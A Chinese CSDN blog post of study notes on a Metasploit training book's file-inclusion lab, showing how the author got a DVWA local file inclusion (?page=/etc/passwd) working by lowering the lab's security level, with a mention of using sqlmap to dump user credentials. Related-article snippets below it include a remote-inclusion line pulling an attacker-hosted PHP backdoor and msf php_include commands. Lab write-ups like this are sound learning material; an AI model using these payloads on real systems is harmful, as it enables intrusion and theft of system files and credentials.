metasploit渗透测试魔鬼训练营 4.3.4 文件包含

最新推荐文章于 2024-06-13 11:31:30 发布
最新推荐文章于 2024-06-13 11:31:30 发布
阅读量372 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yrx0619/article/details/79360464
版权

metasploit中4.3.4文件包含攻击无法成功
修改

http://192.168.10.144/dvwa/vulnerabilities/fi/?page=includ.php

http://192.168.10.144/dvwa/vulnerabilities/fi/?page=/etc/passwd

提示

ERROR: File not found!

首先通过
find / -name “include.php”
找到对应的include.php文件

/owaspbwa/dvwa-svn/vulnerabilities/fi/include.php

尝试修改
include.php文件内容,发现可以显示,但是使用其他文件不成功。表明显示的php文件中添加了判断,如果文件名不是include.php就提示错误。
找到该页面对应的php文件
就在/owaspbwa/dvwa-svn/vulnerabilities/fi/的source文件夹里面,该目录下有三个文件

high.php  low.php  medium.php

其中high.php中可以看到确实做了限制

<?php

        $file = $_GET['page']; //The page we wish to display 

        // Only allow include.php
        if ( $file != "include.php" ) {
                echo "ERROR: File not found!";
                exit;
        }

?>

而low.php中没有

<?php

        $file = $_GET['page']; //The page we wish to display 

?>

那么是什么控制应该调用那个源文件呢,这是通过浏览器的DevTools 查看访问的时候都post了些什么,这是发现cookie字段中有一个security的字段

security    high

那么这个字段是怎么进行修改配置的呢

根据cookie的原理可以知道cookie是由服务器生成,保存在客户端中的。那么设置肯定是在服务器端进行设置的。

重新登录该系统,第一个login的时候并没有security字段,第一个想到的是是否是根据用户名来设置的,管理员的安全级别高呢,通过sqlmap获取到所有用户的账号密码,都尝试登录发现security字段都是high,那么肯定是在系统中设置的。

继续在首页查找,在/owaspbwa/dvwa-svn目录下
index.php文件中查找cookie相关配置,发现并没有知道,这是看到该目录下有一个security.php文件,打开发现确实有设置security的代码

if( isset( $_POST['seclev_submit'] ) ) {
        $securityLevel = 'high';

        switch( $_POST[ 'security' ] ) {
                case 'low':
                        $securityLevel = 'low';
                        break;
                case 'medium':
                        $securityLevel = 'medium';
                        break;
        }

既然和index.php在同一级目录下,而且都是php文件,应该可以通过浏览器打开
浏览器中输入

http://192.168.10.144/dvwa/security.php

果然看到了设置security的页面,设置为low即可。

这时再输入

http://192.168.10.144/dvwa/vulnerabilities/fi/?page=/etc/passwd

/etc/passwd的内容显示出来了。

yrx0619
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP文件包含漏洞 Metasploit
课嗨教育的专栏
11-13 2209
原理: METASPLOIT生成PHP 或者PYTHON的DOOR EG: http://5.5.5.3:1111/1.txt 然后/lfi.php?file=http://5.5.5.3:1111/1.txt 启动METASPLOIT msf > use exploit/unix/webapp/php_include msf exploit(php_include) > set RHOST 5.5.5.2 RHOST => 5.5.5.2 msf exploit(php_in
metasploit 渗透测试魔鬼训练营 笔记(一) 配置环境
热门推荐
qq_40476955的博客
12-27 1万+
PS:工欲善其事必先利其器 渗透测试中,搭建渗透测试实验环境对于整个渗透测试项目相当重要。 在自主可控的实验环境中,先搭建虚拟机进行试验,再对真实目标进行实施,尽管看上去相当费劲,但实际上具有效率和可操作性。 部署了完整的实验环境后,就可以开始实践之后的项目了。 在文后附有 metasploit 渗透测试魔鬼训练营的 靶机镜像和源代码
Metasploit渗透测试魔鬼训练营》 之 文件包含
duangduang2020的博客
10-07 1702
文件包含漏洞包括本地文件包含(LFI)和远程文件包含(RFI)。详细讲解请自行度娘,这里一是利用最简单的代码对文件包含漏洞进行展示;二是结合《metasploit渗透测试魔鬼训练营》的实验环境进行讲解。 一、本地文件包含漏洞(LFI) (一)LFI展现 在WEB服务器A(192.168.80.1)下有三个文件 1.fl.php        : 2.read.php      :  3
Metasploit渗透测试魔鬼训练营
cyynid的博客
01-17 748
7)利益性:利益永远是各种攻击的驱动力,Web攻击也不例外。近期相关司法部门公布有组织性的Web应用攻击,谋取利益的犯罪团伙案件越来越多,无论直接攻击Web 应用服务器,还是攻击欺骗客户终端的钓鱼攻击,抑或是通过可怕的分布式拒绝服务攻击(DDoS)进行敲诈,通过Web犯罪可以说是利润丰厚。6)变化性:Web应用的调整对于一个业务经常变化的公司来说,可以算是家常便饭,但是对于调整Web应用的开发人员、系统管理员等,他们往往缺乏充分的安全培训,却有着对复杂网络应用修改的特权,这样很难保证安全策略很好的实施。
渗透测试入门教程(非常详细),从零基础入门到精通,看完这一篇就够了
最新发布
xx16755498986的博客
06-13 887
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。网络安全产业就像一个江湖,各色人等聚集。
最全《MetaSploit渗透测试魔鬼训练营》之环境搭建(1),2024年最新2024软件测试春招
2401_84765537的博客
05-11 991
*注意:**DHCP设置中结束IP地址最后为255,否则后序端口扫描,254的那台会失败。其中,BT5太老了,都使用kali了,于是我换成了kali,接下来进行具体虚拟机的配置。(img-LbP1Zik3-1715387110838)]来重启网络,浏览器输入ip后可查看dvssc门户网站,说明此靶机配置成功。如果是自己,就写127.0.0.1即可,后面的靶机不再赘述。选择.vmx,使用VMware打开,选择我已复制该虚拟机。作为内外网网关,有两个网卡,都需要设置好。打开cmd命令窗口,输入命令。
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit_测试魔鬼训练营.zip
09-27
首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试...很多知识点都配有案例解析,更重要的是每章还有精心设计的“魔鬼训练营实践作业”,充分体现了“实践,实践,再实践”的宗旨。
metasploit渗透测试魔鬼训练营学习笔记第七章--社会工程学
Donald Liang 的专栏
04-06 1493
五.社工工程学     5.1社会工程系框架          5.1.1信息搜集                 maltego是一个高度自动化的信息搜集工具,集成在BT5中,如果国内网络环境使用时无法获取结果,可能是无法与信息提供网站建立连接,可以使用VPN或代理服务器。          5.1.2诱导                 1.提高诱导能力  
Metasploit渗透测试魔鬼训练营笔记一
韩龙科技
06-17 409
Kali Liunx系统 命令 说明 msfupdate 更新 msfconsole 启动 help xxx 查看帮助 search 查找模块 use xxx 使用模块 show payloads 显示可用载荷 show options 显示模块可用参数 exploit 执行 ...
Matwsploit 渗透测试 魔鬼训练营 笔记
csdnfala的博客
07-23 408
解决内网客户机 WinXP 连接不上OWASP服务器网址的问题 问题描述 在按照书本配置好网络设置后关闭了VMware 再次打开进行 存储型XSS 实验时发现 内网客户机winxp无法连接"http://dvssc.com"OWASP 服务端也无法ping通客户机,显示network unreachable 解决办法 打开网关服务器linux metasploitable,检查网卡配置,检查转...
渗透学习笔记
莫黎小天
11-06 2303
一、SQL注入漏洞 SQL注入:web程序对用户输入数据的合法性没有判断,前端传入后端的参数可控的,并且参数带入数据库查询,攻击者可通过构造SQL语句来实现对数据库的任意操作。 1.sql注入原理 满足条件: ​ 参数用户可控:前端传入后端的内容用户可以控制 ​ 参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。 原因:用户输入的数据被SQL解释器执行 2.注入漏洞分类 1)数字型注入 当输入的参数为整型时,如:ID、年龄、页码,若存在注入漏洞,则可认为是数字型 测试:
神仙级渗透测试入门教程(非常详细),从零基础入门到精通,从看这篇开始!
libaiup的博客
06-18 8929
渗透测试:指的是试图利用系统、网络、人力资源或实物资产中的弱点或漏洞,以对安全控制的有效性进行压力测试。
渗透基础知识入门(自学笔记)
woqusss的博客
07-31 3175
渗透,要学的东西还是比较广,需要有一些基础知识作铺垫开始学,而且作为一个刚踏上学习道路不久的小伙子更应该在学习道路中不断补充更多基础知识,如编程语言,网络知识等,该篇笔记做一些基础知识的铺垫,主要围绕网络知识(域名,DNS,数据包),操作系统,数据库,Web组成架构(网站源码,操作系统,中间件,数据库),Web相关安全漏洞介绍,拓展,后门,常见的加密方式 比方说,我现在想日了某站点,那么总应该知道这个站点是哪个名字或者有什么唯一标识吧,这时候就有了IP(每一个网络和主机都会有一个逻辑地址,在交换数据
渗透学习
stqer的博客
06-30 1220
渗透学习
渗透测试怎么学?从零基础入门到精通,看完这一篇就够了
z099164的博客
03-25 1688
渗透测试怎么学?我告诉你
渗透测试入门教程(非常详细),从零基础入门到精通,看完这一篇就够了_渗透测试教程
Galaxy_0的博客
02-21 1276
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。网络安全产业就像一个江湖,各色人等聚集。
零基础自学网络安全 / 网络渗透攻防路线学习方法【建议收藏】
2201_75735270的博客
12-13 823
是一种面向对象、直译式电脑编程语言,具有近二十年的发展历史,成熟且稳定。它包含了一组完善而且容易理解的标准库,能够轻松完成很多常见的任务。它的语法简捷和清晰,尽量使用无异义的英语单词,与其它大多数程序设计语言使用大括号不一样,它使用缩进来定义语句块。与 Scheme、Ruby、Perl、Tcl 等动态语言一样,Python 具备垃圾回收功能,能够自动管理内存使用。它经常被当作脚本语言用于处理系统管理任务和网络程序编写,然而它也非常适合完成各种高级任务。
web渗透学习路线图
weixin_39205521的博客
03-24 1063
前言 首先,你要高度热爱网络安全这个领域,你要问问自己是否是真的热爱这个行业,自己是否会因为各种了理由半途而废,放弃掉你的热爱。衡量热爱的方法特别特别地简单:看看自己主动花了多少时间在哪些事情方面,重点:『主动 + 时间』。两个条件都不能满足的,请自行将自己PASS掉,别浪费时间。其次渗透行业最注重的就是实战能力,并且知识更新较快,例如一个厂商更新了补丁就要去跟进,去掌握可能成为薄弱的渗透测试点,利用Nday作为突破。这也导致了你要有时间去搜集去跟进,各大网络软件厂商的更新内容。 渗透测试的技能点多的数不过
metasploit渗透测试魔鬼训练营
09-03
### 回答1: Metasploit渗透测试魔鬼训练营是一种针对渗透测试人员的培训课程,旨在帮助学员掌握使用Metasploit框架进行渗透测试的技能。该课程包括理论知识和实践操作,涵盖了Metasploit框架的基础知识、漏洞利用、后渗透等内容。通过参加该训练营,学员可以提高自己的渗透测试技能,为企业提供更加全面和有效的安全保障。 ### 回答2: Metasploit渗透测试魔鬼训练营是一种专注于渗透测试技术的培训计划。Metasploit是一款广泛使用的渗透测试工具,能够帮助安全专业人士评估网络系统的弱点和漏洞,并提供相应的修复方案。Metasploit渗透测试魔鬼训练营旨在提供系统性的培训,使学员能够熟练运用Metasploit进行渗透测试,并成为专业的渗透测试人员。 这个魔鬼训练营采用实践与理论相结合的教学方法,通过大量的实际案例和模拟演练来帮助学员有效掌握渗透测试技术。训练营的内容包括Metasploit的基础知识、常见漏洞的挖掘与利用、渗透测试的方法与策略等。学员将学习如何利用Metasploit对目标网络进行扫描、漏洞利用和漏洞修复,以保证网络安全。 在这个训练营中,学员还将接触到实际渗透测试的场景和挑战,通过团队合作来解决复杂的安全问题。这不仅可以提高学员的问题解决能力,还可以培养他们的团队合作精神和沟通能力。 Metasploit渗透测试魔鬼训练营适合那些对渗透测试感兴趣,想要提升自己技能的安全专业人员。通过参加这个培训计划,学员可以全面了解Metasploit的功能与应用,并具备进行渗透测试的实际能力。这对于保护网络安全,提高企业的安全性具有重要意义。 ### 回答3: Metasploit是一款著名的渗透测试工具,它被广泛用于评估网络系统的安全性和漏洞。Metasploit渗透测试魔鬼训练营是一个专门针对Metasploit工具进行训练和实践的培训班。 这个训练营的目的是让参与者全面了解Metasploit的功能和使用方法,并通过实际操作和挑战来提高他们的渗透测试技能。在训练中,学员将学习如何使用Metasploit来发现和利用目标系统中的漏洞,以及如何进行渗透测试和攻击模拟。这些实践活动将使学员更好地理解网络安全漏洞的本质和攻击者的行为方式。 Metasploit渗透测试魔鬼训练营学习过程是非常实际的,学员将通过真实情景模拟来进行虚拟网络环境下的渗透测试。他们将学习如何选择和配置适当的漏洞利用模块,如何使用payloads以获取系统访问权限,并了解如何绕过防御机制和检测系统。 这个训练营的主要优势之一是培训者具有丰富的经验和专业知识,能够引导学员在实践中掌握Metasploit的各个方面。此外,训练营还提供了配套的学习资料和交互环节,使学员能够进一步加强他们的学习效果。 总而言之,Metasploit渗透测试魔鬼训练营是一个提供高质量Metasploit培训和实践机会的地方。通过参加这个训练营,学员可以提高他们的渗透测试技能,增强他们评估网络安全的能力,并为他们未来的职业发展打下坚实的基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值